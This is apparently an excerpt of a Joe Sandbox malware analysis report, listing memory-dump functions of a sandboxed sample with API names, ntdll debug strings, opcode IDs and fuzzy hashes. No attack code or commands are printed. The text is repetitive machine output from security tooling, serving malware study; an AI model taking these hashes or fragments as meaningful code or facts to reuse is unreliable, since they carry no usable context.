                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID:
                                                                                    • API String ID: 48624451-0
                                                                                    • Opcode ID: cefc27cb09e7ce511fd58ccb92d244368324b1c50c3305082cca3bf8b87296ec
                                                                                    • Instruction ID: 80799e980b4904b8a7f4fd64c7864fb1c463894eb5d21dcf7ae121f53fd5fbfc
                                                                                    • Opcode Fuzzy Hash: cefc27cb09e7ce511fd58ccb92d244368324b1c50c3305082cca3bf8b87296ec
                                                                                    • Instruction Fuzzy Hash: 8F51D5B1E04156BEDB61DBAC889097EFBF8BB08240B548269F4D5D7681D334DE40CBA4

                                                                                    Control-flow Graph (basic blocks 104a250-104a6d6 and 10979bb-1097afc; calls 104a6e0, 104a840, 1034508, 10bf290, RtlDebugPrintTimes)
                                                                                    Strings
                                                                                    • SsHd, xrefs: 0104A3E4
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010979D5
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 010979D0, 010979F5
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010979FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-929470617
                                                                                    • Opcode ID: 1654af037cc8df1126ec46737817dde131a02bc8f21508129cd8e31bd9c16855
                                                                                    • Instruction ID: 51830589ca6c4cc67ebda3ed84c3aaa51392a4cf1b7a151cc92c3018a4989a75
                                                                                    • Opcode Fuzzy Hash: 1654af037cc8df1126ec46737817dde131a02bc8f21508129cd8e31bd9c16855
                                                                                    • Instruction Fuzzy Hash: B5E1C3B1744302CFEB65CE28C8D476ABBE0ABC8214F14467DF9D6CB291E735E9458B81
                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01099346
                                                                                    • GsHd, xrefs: 0104D874
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 01099341, 01099366
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0109936B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                    • API String ID: 3446177414-576511823
                                                                                    • Opcode ID: d44603665f7e0196a23279a781e24290b92cd93cfe8e10ae63fb6cdc304ef546
                                                                                    • Instruction ID: 4ccb1b0e38b813b8577d58aba49852257d8aba7b76ce7ca35156337ee88bd1c0
                                                                                    • Opcode Fuzzy Hash: d44603665f7e0196a23279a781e24290b92cd93cfe8e10ae63fb6cdc304ef546
                                                                                    • Instruction Fuzzy Hash: C6E1B1B46043429FEB61CF98C4D0B6ABBE5BB58318F0449BDE9D5CB281D771E844CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                    • Instruction ID: 2b2e3d4aad7dd55391ec78d81542257b2f6831b67bf1eccfc6e24e9fd580bd02
                                                                                    • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                    • Instruction Fuzzy Hash: 6981E270E052498EEF65CE6CC8907FEBBF1BF45320F18429AD9E1A7291C7349941CB59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$@
                                                                                    • API String ID: 3446177414-1194432280
                                                                                    • Opcode ID: 93637588da6b37a9f598aeb98ac8974697f3260635f646a4c5a3a27a97a65803
                                                                                    • Instruction ID: c6dccb8fcd70b8f682bab46b2e98b00bd90c5a603430d98a0c95d386883a8734
                                                                                    • Opcode Fuzzy Hash: 93637588da6b37a9f598aeb98ac8974697f3260635f646a4c5a3a27a97a65803
                                                                                    • Instruction Fuzzy Hash: 1A811A72D00269ABDB359F54CC44BEEB7B8AB48754F0041EAEA59B7280D7705E84DFA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0Ivw$0Ivw$0Ivw$X
                                                                                    • API String ID: 3446177414-3775388739
                                                                                    • Opcode ID: 9e71f420dea8ca60e599fbcca09b70c3075898e3aed2caccf5d99102b5b4e8d4
                                                                                    • Instruction ID: 70336041f97ae327d9c6474930d37c6638b021722506ffd7f09f1bb74a1e8563
                                                                                    • Opcode Fuzzy Hash: 9e71f420dea8ca60e599fbcca09b70c3075898e3aed2caccf5d99102b5b4e8d4
                                                                                    • Instruction Fuzzy Hash: 0E31C231D0425EFBCF36EF69D804B8D3BB1AB84754F0A8069FD5496241D3748AA0CF5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                    • API String ID: 3446177414-56086060
                                                                                    • Opcode ID: 190c2bfc4946f6f43f83a02bf09abc2510dc1dd067664fd7e6e3415607626bed
                                                                                    • Instruction ID: 873b4739185c8596683814d55d7687628b10774e453d4a561ed1f226364be9a8
                                                                                    • Opcode Fuzzy Hash: 190c2bfc4946f6f43f83a02bf09abc2510dc1dd067664fd7e6e3415607626bed
                                                                                    • Instruction Fuzzy Hash: 40416A31600742DFEB62DF68C454BAEBBE5FF44324F1440A9D9C187691CB78A880DB91
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 010B4899
                                                                                    • LdrpCheckRedirection, xrefs: 010B488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010B4888
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 3446177414-3154609507
                                                                                    • Opcode ID: 4f81dc52302050909bab896bea98c319be46be1684ab150ee2617ef1c8e8c379
                                                                                    • Instruction ID: 25668a38f7d018de2cb785cda237b3ad9fc0a8a50f6e1fd51aba612855ee0482
                                                                                    • Opcode Fuzzy Hash: 4f81dc52302050909bab896bea98c319be46be1684ab150ee2617ef1c8e8c379
                                                                                    • Instruction Fuzzy Hash: 3D41D332A006519BDB61CE5CD8C0AAA7BE4FF49A50F0505A9EDDADB353D330EA10CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                    • API String ID: 3446177414-3526935505
                                                                                    • Opcode ID: ac6b6b76df1cd4878e79715a86776509d793683ce9845db4b8d7a74479ae0916
                                                                                    • Instruction ID: aad3c2a185e87dadc7c19d09af1e86b8663449314ca40c3ff58dfaa41b4b10a7
                                                                                    • Opcode Fuzzy Hash: ac6b6b76df1cd4878e79715a86776509d793683ce9845db4b8d7a74479ae0916
                                                                                    • Instruction Fuzzy Hash: 2A31F630214795DFEB679B68C819B9EBBE4FF01650F044099E8D68B692C7A8A880C751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    • Opcode ID: 54e7283a0d0869d1c2523156fbd9e7fb2c08389a044048a40ed510e0f5f6a911
                                                                                    • Instruction ID: df0e265a0579d4cd3431f4013bc9bbefce403deedbb8253506e6acc67797b613
                                                                                    • Opcode Fuzzy Hash: 54e7283a0d0869d1c2523156fbd9e7fb2c08389a044048a40ed510e0f5f6a911
                                                                                    • Instruction Fuzzy Hash: 3F11303290421CEBCF25AF94E8486DC7B71FF44364F108229FDA6672D0CB715A50CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f7696bd2610291656ff9a4827385a7f1aa653a8151540a03ec9410c7da2e10f
                                                                                    • Instruction ID: 5f4f5c3091a0e138126775199b1ab57bbce08ad2212710d90a3a8c8e4aac1428
                                                                                    • Opcode Fuzzy Hash: 9f7696bd2610291656ff9a4827385a7f1aa653a8151540a03ec9410c7da2e10f
                                                                                    • Instruction Fuzzy Hash: A9E110B0D00609DFCFA5CFA9C984A9EBBF1FF48314F24456AE986A7261D774A941CF10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 85f5bd4966baee70941a5aec8e42524bf7af44977b0f884248f8f064f0a05313
                                                                                    • Instruction ID: 72ad579a0a2c8ca8d5ddbd2538f8efe92c45926c1189624807ea1237bc956b42
                                                                                    • Opcode Fuzzy Hash: 85f5bd4966baee70941a5aec8e42524bf7af44977b0f884248f8f064f0a05313
                                                                                    • Instruction Fuzzy Hash: 82711371A0021AAFDF05DFE8C884ADDBBB5AF48314F54402AE985EB254D734AA05CF90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 316cffaa4d2e823fe40f98181e0dbf570f44d2a06f7573af7100a9ff9536bed1
                                                                                    • Instruction ID: 40b61401e95f40da0d8709582ee14d8e71f84b3fd1cdf28feb0f1332ef75fbf6
                                                                                    • Opcode Fuzzy Hash: 316cffaa4d2e823fe40f98181e0dbf570f44d2a06f7573af7100a9ff9536bed1
                                                                                    • Instruction Fuzzy Hash: 44514172E0021AAFEF09CFD8D844ADDBBF1BF48354F58812AE955AB250D734AA01CF54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                    • String ID:
                                                                                    • API String ID: 4281723722-0
                                                                                    • Opcode ID: b9edf7345651eaf4be6c2a684516d724999687a38a4f7b03b3dc2cf2ff4926ef
                                                                                    • Instruction ID: 36f181af312089b520f579c47af79cfd0f93fa29a86abfecca438b4781f56b0b
                                                                                    • Opcode Fuzzy Hash: b9edf7345651eaf4be6c2a684516d724999687a38a4f7b03b3dc2cf2ff4926ef
                                                                                    • Instruction Fuzzy Hash: 6C313475E00229EFCF25EFA8D884A9DBBF0BB58320F14412AE861F7280C7715940CF54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: cbe9af6c5655ae03e9186debaf2cd7f7e0f06adb6819356460263c17ea8f5bf4
                                                                                    • Instruction ID: 8cdf1e210db72c4c5468d2d85924743058db5548eaa37465bf6e48d322f2e8ab
                                                                                    • Opcode Fuzzy Hash: cbe9af6c5655ae03e9186debaf2cd7f7e0f06adb6819356460263c17ea8f5bf4
                                                                                    • Instruction Fuzzy Hash: 77325970D0426ADFDB65CF68C884BEDBBF8BB48304F0081E9E589A7291D7755A84DF90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                    • Instruction ID: 437541ac0b697d3eb74a4787f4ef93ef6e1e5670fa6dea0ca669f7c414c13a09
                                                                                    • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                    • Instruction Fuzzy Hash: 5891B471E0020A9BEB64DF6DC9886BEBBF5FF443A0F14855AE9D5E72C0D73089408769
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Bl$l
                                                                                    • API String ID: 3446177414-208461968
                                                                                    • Opcode ID: 54968249cbc97cf6f264424728b880958a0efc6871ac3afd7592b17655fb3862
                                                                                    • Instruction ID: 1768228d1383a475bd103a79deff4911764bb2a10a0e80c109288e9015ed5be8
                                                                                    • Opcode Fuzzy Hash: 54968249cbc97cf6f264424728b880958a0efc6871ac3afd7592b17655fb3862
